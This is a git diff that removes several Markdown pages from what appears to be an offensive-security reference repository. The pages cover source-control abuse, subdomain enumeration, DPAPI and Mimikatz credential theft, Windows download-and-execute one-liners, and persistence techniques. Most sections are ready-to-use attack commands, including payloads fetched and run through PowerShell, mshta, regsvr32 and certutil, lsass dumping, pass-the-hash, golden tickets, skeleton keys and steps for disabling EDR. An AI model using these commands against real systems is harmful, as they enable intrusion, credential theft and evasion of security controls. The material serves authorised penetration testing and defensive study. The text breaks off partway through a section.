https://gitlab.something.local -o patID - SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser - SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser - ``` -* Create/List an SSH key to be used in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" - SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" - SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local - SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local - SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID - SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID - ``` - -## Personal Access Token - -Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. - -```ps1 -curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" -``` - -## Gitlab CI/Github Actions - -* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml` - ```yaml - stages: - - test - - test: - stage: test - script: - - | - whoami - parallel: - matrix: - - RUNNER: VM1 - - RUNNER: VM2 - - RUNNER: VM3 - tags: - - ${RUNNER} - ``` -* Github Action "Command Execution" example: `.github/workflows/example.yml` - ```yml - name: example - on: - workflow_dispatch: - push: - branches: [ main ] - pull_request: - branches: [ main ] - - jobs: - build: - runs-on: windows-2019 - - steps: - - name: Execute - run: | - whoami - ``` - -## References - -* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/) -* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) \ No newline at end of file diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md deleted file mode 100644 index 09c2a5e..0000000 --- a/Methodology and Resources/Subdomains Enumeration.md +++ /dev/null @@ -1,203 +0,0 @@ -# Subdomains Enumeration - -## Summary - -* [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext) - * Subbrute - * KnockPy - * GoogleDorks - * EyeWitness - * Sublist3r - * Subfinder - * Findomain - * Aquatone (Ruby and Go versions) - * AltDNS - * MassDNS - * Nmap - * Dnsdumpster -* Subdomain take over - * tko-subs - * HostileSubBruteForcer - * SubOver - -## Enumerate all subdomains (only if the scope is *.domain.ext) - -### Using Subbrute - -```bash -git clone https://github.com/TheRook/subbrute -python subbrute.py domain.example.com -``` - -### Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS" - -```bash -git clone https://github.com/guelfoweb/knock -git clone https://github.com/danielmiessler/SecLists.git -knockpy domain.com -w subdomains-top1mil-110000.txt -``` - -Using EyeWitness and Nmap scans from the KnockPy and enumall scans - -```bash -git clone https://github.com/ChrisTruncer/EyeWitness.git -./setup/setup.sh -./EyeWitness.py -f filename -t optionaltimeout --open (Optional) -./EyeWitness -f urls.txt --web -./EyeWitness -x urls.xml -t 8 --headless -./EyeWitness -f rdp.txt --rdp -``` - -### Using Google Dorks and Google Transparency Report - -You need to include subdomains ;) -https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true - -```bash -site:*.domain.com -www -site:domain.com filetype:pdf -site:domain.com inurl:'&' -site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin -site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf -site:*.*.domain.com -``` - -### Using Sublist3r - -```bash -To enumerate subdomains of specific domain and show the results in realtime: -python sublist3r.py -v -d example.com - -To enumerate subdomains and enable the bruteforce module: -python sublist3r.py -b -d example.com - -To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines -python sublist3r.py -e google,yahoo,virustotal -d example.com - -python sublist3r.py -b -d example.com -``` - -### Using Subfinder - -```powershell -go get github.com/subfinder/subfinder -./Subfinder/subfinder --set-config PassivetotalUsername='USERNAME',PassivetotalKey='KEY' -./Subfinder/subfinder --set-config RiddlerEmail="EMAIL",RiddlerPassword="PASSWORD" -./Subfinder/subfinder --set-config CensysUsername="USERNAME",CensysSecret="SECRET" -./Subfinder/subfinder --set-config SecurityTrailsKey='KEY' -./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt -``` - -### Using Findomain - -```powershell -$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux -$ chmod +x findomain-linux -$ findomain_spyse_token="YourAccessToken" -$ findomain_virustotal_token="YourAccessToken" -$ findomain_fb_token="YourAccessToken" -$ ./findomain-linux -t example.com -o -``` - -### Using Aquatone - old version (Ruby) - -```powershell -gem install aquatone - -Discover subdomains : results in ~/aquatone/example.com/hosts.txt -aquatone-discover --domain example.com -aquatone-discover --domain example.com --threads 25 -aquatone-discover --domain example.com --sleep 5 --jitter 30 -aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ - -Active scans : results in ~/aquatone/example.com/urls.txt -aquatone-scan --domain example.com -aquatone-scan --domain example.com --ports 80,443,3000,8080 -aquatone-scan --domain example.com --ports large -aquatone-scan --domain example.com --threads 25 - -Final results -aquatone-gather --domain example.com -``` - -Alternatively, you can use the [Docker image](https://hub.docker.com/r/txt3rob/aquatone-docker/) provided by txt3rob. - -```powershell -https://hub.docker.com/r/txt3rob/aquatone-docker/ -docker pull txt3rob/aquatone-docker -docker run -it txt3rob/aquatone-docker aq example.com -``` - -### Using Aquatone - new version (Go) - -```powershell -# Subfinder version -./Subfinder/subfinder -d $1 -r 8.8.8.8,1.1.1.1 -nW -o /tmp/subresult$1 -cat /tmp/subresult$1 | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1 - -# Amass version -./Amass/amass -active -brute -o /tmp/hosts.txt -d $1 -cat /tmp/hosts.txt | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1 -``` - -### Using AltDNS - -It's recommended to use massdns in order to resolve the result of `AltDNS` - -```powershell -WORDLIST_PERMUTATION="./Altdns/words.txt" -python2.7 ./Altdns/altdns.py -i /tmp/inputdomains.txt -o /tmp/out.txt -w $WORDLIST_PERMUTATION -``` - -Alternatively you can use [goaltdns](https://github.com/subfinder/goaltdns) - -### Using MassDNS - -```powershell -DNS_RESOLVERS="./resolvers.txt" -cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt -``` - -### Using Nmap - -```powershell -nmap -sn --script hostmap-crtsh host_to_scan.tld -``` - -### Using dnsdumpster - -```ps1 -git clone https://github.com/nmmapper/dnsdumpster -python dnsdumpster.py -d domainname.com -``` - -## Subdomain take over - -Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. - -### Using tko-subs - -```powershell -go get github.com/anshumanbh/tko-subs -./bin/tko-subs -domains=./lists/domains_tkos.txt -data=./lists/providers-data.csv -``` - -### Using HostileSubBruteForcer - -```bash -git clone https://github.com/nahamsec/HostileSubBruteforcer -chmod +x sub_brute.rb -./sub_brute.rb -``` - -### Using SubOver - -```powershell -go get github.com/Ice3man543/SubOver -./SubOver -l subdomains.txt -``` - -## References - -* [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/) -* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/) diff --git a/Methodology and Resources/Windows - DPAPI.md b/Methodology and Resources/Windows - DPAPI.md deleted file mode 100644 index 1126fc6..0000000 --- a/Methodology and Resources/Windows - DPAPI.md +++ /dev/null @@ -1,86 +0,0 @@ -# Windows - DPAPI - -> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder. - -## Summary - -* [Data Protection API](#data-protection-api) - * [List Credential Files](#list-credential-files) - * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) - * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain) - * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely) - - -## Data Protection API - -* Outside of a domain: the user's `password hash` is used to encrypt these "blobs". -* Inside a domain: the `domain controller's master key` is used to encrypt these blobs. - -With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work -stations in the domain. - -```ps1 -vaultcmd /list - -VaultCmd /listcreds:| /all -vaultcmd /listcreds:"Windows Credentials" /all -``` - -### List Credential Files - -```ps1 -dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\ -dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\ - -Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ -Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ -``` - - -### Mimikatz - Credential Manager & DPAPI - -```powershell -# check the folder to find credentials -dir C:\Users\\AppData\Local\Microsoft\Credentials\* - -# check the file with mimikatz -mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 -# find master key -mimikatz !sekurlsa::dpapi -# use master key -mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b - -# find and export backup keys -lsadump::backupkeys /system:dc01.lab.local /export -# use backup keys -dpapi::masterkey /in:"C:\Users\\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk -``` - -### Hekatomb - Steal all credentials on domain - -> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. - -```python -pip3 install hekatomb -hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp -``` - -![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png) - -### DonPAPI - Dumping DPAPI credz remotely - -* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI) - -```ps1 -DonPAPI.py domain/user:passw0rd@target -DonPAPI.py --hashes : domain/user@target - -# using domain backup key -dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip -python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list -``` - -## References - -* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) -* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Download and Execute.md b/Methodology and Resources/Windows - Download and Execute.md deleted file mode 100644 index cd2c331..0000000 --- a/Methodology and Resources/Windows - Download and Execute.md +++ /dev/null @@ -1,122 +0,0 @@ -# Windows - Download and execute methods - -## Downloaded files location - -- C:\Users\\AppData\Local\Microsoft\Windows\Temporary Internet Files\ -- C:\Users\\AppData\Local\Microsoft\Windows\INetCache\IE\ -- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV - -## Powershell - -From an HTTP server - -```powershell -powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" - -# Download only -(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerUp.ps1", "C:\Windows\Temp\PowerUp.ps1") -Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" - -# Download and run Rubeus, with arguments -$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe') -$assem = [System.Reflection.Assembly]::Load($data) -[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) - -# Execute a specific method from an assembly -$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll') -$assem = [System.Reflection.Assembly]::Load($data) -$class = $assem.GetType("ClassLibrary1.Class1") -$method = $class.GetMethod("runner") -$method.Invoke(0, $null) -``` - -From a Webdav server - -```powershell -powershell -exec bypass -f \\webdavserver\folder\payload.ps1 -``` - -## Cmd - -```powershell -cmd.exe /k < \\webdavserver\folder\batchfile.txt -``` - -## Cscript / Wscript - -```powershell -cscript //E:jscript \\webdavserver\folder\payload.txt -``` - -## Mshta - -```powershell -mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) -``` - -```powershell -mshta http://webserver/payload.hta -``` - -```powershell -mshta \\webdavserver\folder\payload.hta -``` - -## Rundll32 - -```powershell -rundll32 \\webdavserver\folder\payload.dll,entrypoint -``` - -```powershell -rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); -``` - -## Regasm / Regsvc @subTee - -```powershell -C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll -``` - -## Regsvr32 @subTee - -```powershell -regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll -``` - -```powershell -regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll -``` - -## Odbcconf - -```powershell -odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} -``` - -## Msbuild - -```powershell -cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" -``` - -## Certutil - -```powershell -certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll -``` - -```powershell -certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe -``` - -## Bitsadmin - -```powershell -bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe -``` - - -## References - -- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md deleted file mode 100644 index 20b614c..0000000 --- a/Methodology and Resources/Windows - Mimikatz.md +++ /dev/null @@ -1,318 +0,0 @@ -# Windows - Mimikatz - -## Summary - -* [Execute commands](#execute-commands) -* [Extract passwords](#extract-passwords) -* [LSA Protection Workaround](#lsa-protection-workaround) -* [Mini Dump](#mini-dump) -* [Pass The Hash](#pass-the-hash) -* [Golden ticket](#golden-ticket) -* [Skeleton key](#skeleton-key) -* [RDP Session Takeover](#rdp-session-takeover) -* [RDP Passwords](#rdp-passwords) -* [Credential Manager & DPAPI](#credential-manager--dpapi) - * [Chrome Cookies & Credential](#chrome-cookies--credential) - * [Task Scheduled credentials](#task-scheduled-credentials) - * [Vault](#vault) -* [Commands list](#commands-list) -* [Powershell version](#powershell-version) -* [References](#references) - -![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) - -## Execute commands - -Only one command - -```powershell -PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit -``` - -Mimikatz console (multiple commands) - -```powershell -PS C:\temp\mimikatz> .\mimikatz -mimikatz # privilege::debug -mimikatz # log -mimikatz # sekurlsa::logonpasswords -mimikatz # sekurlsa::wdigest -``` - -## Extract passwords - -> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled. - -```powershell -mimikatz_command -f sekurlsa::logonPasswords full -mimikatz_command -f sekurlsa::wdigest - -# to re-enable wdigest in Windows Server 2012+ -# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest -# create a DWORD 'UseLogonCredential' with the value 1. -reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1 -``` - -:warning: To take effect, conditions are required : -- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2: - * Adding requires lock - * Removing requires signout -- Win10: - * Adding requires signout - * Removing requires signout -- Win2016: - * Adding requires lock - * Removing requires reboot - -## LSA Protection Workaround - -- LSA as a Protected Process (RunAsPPL) - ```powershell - # Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1 - reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa - - # Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe - # Now lets import the mimidriver.sys to the system - mimikatz # !+ - - # Now lets remove the protection flags from lsass.exe process - mimikatz # !processprotect /process:lsass.exe /remove - - # Finally run the logonpasswords function to dump lsass - mimikatz # privilege::debug - mimikatz # token::elevate - mimikatz # sekurlsa::logonpasswords - - # Now lets re-add the protection flags to the lsass.exe process - mimikatz # !processprotect /process:lsass.exe - - # Unload the service created - mimikatz # !- - - - # https://github.com/itm4n/PPLdump - PPLdump.exe [-v] [-d] [-f] - PPLdump.exe lsass.exe lsass.dmp - PPLdump.exe -v 720 out.dmp - ``` - -- LSA is running as virtualized process (LSAISO) by **Credential Guard** - ```powershell - # Check if a process called lsaiso.exe exists on the running processes - tasklist |findstr lsaiso - - # Lets inject our own malicious Security Support Provider into memory - # require mimilib.dll in the same folder - mimikatz # misc::memssp - - # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log - ``` - - -## Mini Dump - -Dump the lsass process with `procdump` - -> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that. - -```powershell -# HTTP method - using the default way -certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe -C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp - -# SMB method - using the pid -net use Z: https://live.sysinternals.com -tasklist /fi "imagename eq lsass.exe" # Find lsass's pid -Z:\procdump.exe -accepteula -ma $lsass_pid lsass.dmp -``` - -Dump the lsass process with `rundll32` - -```powershell -rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full -``` - - -Use the minidump: -* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"` - ```powershell - mimikatz # sekurlsa::minidump lsass.dmp - mimikatz # sekurlsa::logonPasswords - ``` -* Pypykatz: `pypykatz lsa minidump lsass.dmp` - - -## Pass The Hash - -```powershell -mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell -``` - -## Golden ticket - -```powershell -.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt -``` - -```powershell -.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit -``` - -## Skeleton key - -```powershell -privilege::debug -misc::skeleton -# map the share -net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz -# login as someone -rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab -``` - -## RDP Session Takeover - -Use `ts::multirdp` to patch the RDP service to allow more than two users. - -* Enable privileges - ```powershell - privilege::debug - token::elevate - ``` -* List RDP sessions - ```powershell - ts::sessions - ``` -* Hijack session - ```powershell - ts::remote /id:2 - ``` - -Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password. - -```powershell -# get the Session ID you want to hijack -query user -create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55" -net start sesshijack -``` - -## RDP Passwords - -Verify if the service is running: - -```ps1 -sc queryex termservice -tasklist /M:rdpcorets.dll -netstat -nob | Select-String TermService -Context 1 -``` - -* Extract passwords manually - ```ps1 - procdump64.exe -ma 988 -accepteula C:\svchost.dmp - strings -el svchost* | grep Password123 -C3 - ``` -* Extract passwords using Mimikatz - ```ps1 - privilege::debug - ts::logonpasswords - ``` - - - - - - - - - -## Credential Manager & DPAPI - -```powershell -# check the folder to find credentials -dir C:\Users\\AppData\Local\Microsoft\Credentials\* - -# check the file with mimikatz -$ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 - -# find master key -$ mimikatz !sekurlsa::dpapi - -# use master key -$ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b -``` - -### Chrome Cookies & Credential - -```powershell -# Saved Cookies -dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect -dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b - -# Saved Credential in Chrome -dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect -``` - -### Task Scheduled credentials - -```powershell -mimikatz(commandline) # vault::cred /patch -TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / -UserName : DOMAIN\user -Comment : -Type : 2 - domain_password -Persist : 2 - local_machine -Flags : 00004004 -Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -Attributes : 0 -``` - -### Vault - -```powershell -vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" -``` - -## Commands list - -| Command |Definition| -|:----------------:|:---------------| -| CRYPTO::Certificates|list/export certificates| -|CRYPTO::Certificates | list/export certificates| -|KERBEROS::Golden | create golden/silver/trust tickets| -|KERBEROS::List | list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.| -|KERBEROS::PTT | pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).| -|LSADUMP::DCSync | ask a DC to synchronize an object (get password data for account). No need to run code on DC.| -|LSADUMP::LSA | Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”| -|LSADUMP::SAM | get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.| -|LSADUMP::Trust | Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).| -|MISC::AddSid | Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.| -|MISC::MemSSP | Inject a malicious Windows SSP to log locally authenticated credentials.| -|MISC::Skeleton | Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.| -|PRIVILEGE::Debug | get debug rights (this or Local System rights is required for many Mimikatz commands).| -|SEKURLSA::Ekeys | list Kerberos encryption keys| -|SEKURLSA::Kerberos | List Kerberos credentials for all authenticated users (including services and computer account)| -|SEKURLSA::Krbtgt | get Domain Kerberos service account (KRBTGT)password data| -|SEKURLSA::LogonPasswords | lists all available provider credentials. This usually shows recently logged on user and computer credentials.| -|SEKURLSA::Pth | Pass- theHash and Over-Pass-the-Hash| -|SEKURLSA::Tickets | Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).| -|TOKEN::List | list all tokens of the system| -|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box| -|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials. - -## Powershell version - -Mimikatz in memory (no binary on disk) with : - -- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire -- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit - -More information can be grabbed from the Memory with : - -- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1) - -## References - -- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) -- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) -- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/) -- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md deleted file mode 100644 index 579c2de..0000000 --- a/Methodology and Resources/Windows - Persistence.md +++ /dev/null @@ -1,629 +0,0 @@ -# Windows - Persistence - -## Summary - -* [Tools](#tools) -* [Hide Your Binary](#hide-your-binary) -* [Disable Antivirus and Security](#disable-antivirus-and-security) - * [Antivirus Removal](#antivirus-removal) - * [Disable Windows Defender](#disable-windows-defender) - * [Disable Windows Firewall](#disable-windows-firewall) - * [Clear System and Security Logs](#clear-system-and-security-logs) -* [Simple User](#simple-user) - * [Registry HKCU](#registry-hkcu) - * [Startup](#startup) - * [Scheduled Tasks User](#scheduled-tasks-user) - * [BITS Jobs](#bits-jobs) -* [Serviceland](#serviceland) - * [IIS](#iis) - * [Windows Service](#windows-service) -* [Elevated](#elevated) - * [Registry HKLM](#registry-hklm) - * [Winlogon Helper DLL](#) - * [GlobalFlag](#) - * [Startup Elevated](#startup-elevated) - * [Services Elevated](#services-elevated) - * [Scheduled Tasks Elevated](#scheduled-tasks-elevated) - * [Binary Replacement](#binary-replacement) - * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) - * [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10) - * [RDP Backdoor](#rdp-backdoor) - * [utilman.exe](#utilman.exe) - * [sethc.exe](#sethc.exe) - * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) - * [Skeleton Key](#skeleton-key) - * [Virtual Machines](#virtual-machines) - * [Windows Subsystem for Linux](#windows-subsystem-for-linux) -* [Domain](#domain) - * [Golden Certificate](#golden-certificate) - * [Golden Ticket](#golden-ticket) -* [References](#references) - - -## Tools - -- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist) - -## Hide Your Binary - -> Sets (+) or clears (-) the Hidden file attribute. If a file uses this attribute set, you must clear the attribute before you can change any other attributes for the file. - -```ps1 -PS> attrib +h mimikatz.exe -``` - -## Disable Antivirus and Security - -### Antivirus Removal - -* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/) -* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html) -* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html) - ```ps1 - cd "C:\Program Files\Elastic\Agent\" - PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall - Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y - Elastic Agent has been uninstalled. - ``` -* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/) - ```ps1 - # Global uninstall password: Password1 - Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db - Look for PasswordHash, PasswordSalt or password, salt strings. - - # Disable Cortex: Change the DLL to a random value, then REBOOT - reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f - - # Disables the agent on startup (requires reboot to work) - cytool.exe startup disable - - # Disables 